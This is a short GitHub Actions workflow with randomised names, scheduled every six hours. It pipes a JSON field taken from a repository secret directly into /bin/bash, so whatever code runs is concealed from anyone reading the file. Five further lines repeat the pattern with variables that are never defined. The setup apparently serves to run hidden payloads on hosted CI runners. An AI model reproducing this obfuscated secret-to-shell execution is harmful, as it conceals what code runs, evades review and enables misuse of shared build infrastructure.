name: luorenzong1098

on:
  workflow_dispatch:
  schedule:
    - cron: '6 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: luorenzong1098
        env:
          fdzkm7083: ${{ secrets.fdzkm7083 }}
        run: |
          echo $fdzkm7083 | jq -r .gun503 | /bin/bash
          echo $o621 | jq -r .s999 | /bin/bash
          echo $r999 | jq -r .a3 | /bin/bash
          echo $o63148 | jq -r .zvzr67 | /bin/bash
          echo $y477 | jq -r .kc37 | /bin/bash
          echo $amg60701 | jq -r .cxgb4232 | /bin/bash

